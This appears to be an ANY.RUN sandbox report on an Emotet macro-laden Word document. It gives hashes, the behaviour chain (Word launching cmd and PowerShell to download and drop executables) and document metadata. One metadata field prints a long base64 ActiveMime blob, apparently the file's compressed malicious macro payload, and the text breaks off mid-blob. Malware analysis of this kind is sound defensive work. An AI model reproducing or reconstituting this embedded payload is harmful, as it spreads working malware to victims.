analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

05616586598.doc

Full analysis: https://app.any.run/tasks/7e26b191-e886-4845-bbdc-29dfefe421dc
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: January 22, 2019, 15:14:48
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
opendir
loader
emotet-doc
emotet
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5:

DF1B636312F266DFD19EF1E99F388B81

SHA1:

778CFAE5B20EFB29B3DD837CA7191315F298C3D1

SHA256:

81A1837A1F222BEE32C84622BF0AAED551D08644F68AA3209EC3DB35696BBEB1

SSDEEP:

3072:uFntGJpjL/xSu90OoiLuDKZXfwKeljR1z:uJEhxUOmD+XfwLX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2976)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2976)
    • Application was dropped or rewritten from another process

      • 269.exe (PID: 3504)
      • 269.exe (PID: 2468)
      • wabmetagen.exe (PID: 296)
      • wabmetagen.exe (PID: 2824)
    • Runs app for hidden code execution

      • cmd.exe (PID: 2608)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3172)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 4044)
      • cmd.exe (PID: 2608)
    • Application launched itself

      • cmd.exe (PID: 2608)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2760)
    • Creates files in the user directory

      • powershell.exe (PID: 3172)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3172)
      • 269.exe (PID: 2468)
    • Starts itself from another location

      • 269.exe (PID: 2468)
    • Connects to unusual port

      • wabmetagen.exe (PID: 2824)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2976)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2976)
    • Dropped object may contain Bitcoin addresses

      • powershell.exe (PID: 3172)
      • 269.exe (PID: 2468)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (31)
.xml | Generic XML (ASCII) (2.3)
.html | HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentMacrosPresent: yes
WordDocumentEmbeddedObjPresent: no
WordDocumentOcxPresent: no
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentDocumentPropertiesRevision: 1
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesCreated: 2019:01:22 13:10:00Z
WordDocumentDocumentPropertiesLastSaved: 2019:01:22 13:10:00Z
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesWords: -
WordDocumentDocumentPropertiesCharacters: 1
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesCharactersWithSpaces: 1
WordDocumentDocumentPropertiesVersion: 16
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesStyleType: paragraph
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleRsidVal: 005A24B1
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentDocSuppDataBinDataName: editdata.mso
WordDocumentDocSuppDataBinData: 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 